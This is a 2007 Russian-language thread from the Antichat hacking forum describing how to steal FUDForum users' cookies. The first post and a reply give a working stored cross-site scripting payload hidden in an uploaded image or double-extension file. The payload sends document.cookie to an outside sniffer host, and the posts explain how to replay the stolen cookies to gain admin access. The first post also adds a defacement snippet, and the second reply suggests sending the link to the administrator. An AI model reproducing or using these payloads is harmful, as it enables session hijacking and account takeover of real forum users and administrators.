ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Уязвимость FUDForum, Ворование куков FUDForum
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость FUDForum, Ворование куков FUDForum
  #1  
Старый 29.01.2007, 21:20
Аватар для HiMiC
HiMiC
Новичок
Регистрация: 22.12.2006
Сообщений: 17
Провел на форуме:
82654

Репутация: 28
Отправить сообщение для HiMiC с помощью ICQ
По умолчанию Уязвимость FUDForum, Ворование куков FUDForum
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим

Код HTML:
<html> 
<head> 
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
</head> 
</html>
После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=get...2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:

Код HTML:
<html> 
<head> 
<h1>Defaced by HiMiC</h1> 
</head> 
</html>
Последний раз редактировалось HiMiC; 29.01.2007 в 21:22..
 
Ответить с цитированием

  #2  
Старый 31.01.2007, 18:45
Аватар для _-Ramos-_
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию
я чуть-чуть делаю на форуме по другому
сначала нахожу в инете какуюто интересную хтмл
сохраняю ее
потом вписываю в нее код
-------------------------------------------------------------------------------------
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
-------------------------------------------------------------------------------------------
сохраняю и переминовываю в тип stranica.rar(или другой формат который поддерживает форум для заливки).html
потом заливаю это на форум в любую тему
также эту ссылку кидаю админу
потом только стоит подменить куки и вы юзер , модер , админ
и делайте че хотите
способ заливки stranica.rar.html выходит на многих форумах в которых проблеми с фильтрацией
П.С. также можна таким методом залить страницу в аватары , и поставить на аватар, только потом код будет чуть-чуть другой
 
Ответить с цитированием

  #3  
Старый 08.02.2007, 17:24
Аватар для Zion
Zion
Новичок
Регистрация: 30.01.2007
Сообщений: 12
Провел на форуме:
54672

Репутация: 5
По умолчанию
Цитата:
Сообщение от HiMiC  
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим

Код HTML:
<html> 
<head> 
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
</head> 
</html>
После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=get...2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:

Код HTML:
<html> 
<head> 
<h1>Defaced by HiMiC</h1> 
</head> 
</html>
HiMiC, вообщем пробывал в картинку вставить этот код, но она почему то не открывается. Подскажи, что то может не правильно делаю? И еще вопрос, как на других форумах это проделывать ?
Последний раз редактировалось Zion; 08.02.2007 в 17:48..
 
Ответить с цитированием

  #4  
Старый 08.02.2007, 17:47
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию
Цитата:
Сообщение от HiMiC  
Можно поприкалываться и так:

Код HTML:
<html> 
<head> 
<h1>Defaced by HiMiC</h1> 
</head> 
</html>
никому такого не пожелаю, просто ужас

__http://security.nnov.ru/Jdocument612.html
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Уязвимость в vBulletin. Или abbsessionhash вместо полных куков Smart12 Форумы 5 23.02.2006 12:52
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Подмен КУКОВ Ipb2.0.4 Tem Форумы 10 13.11.2005 13:26
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ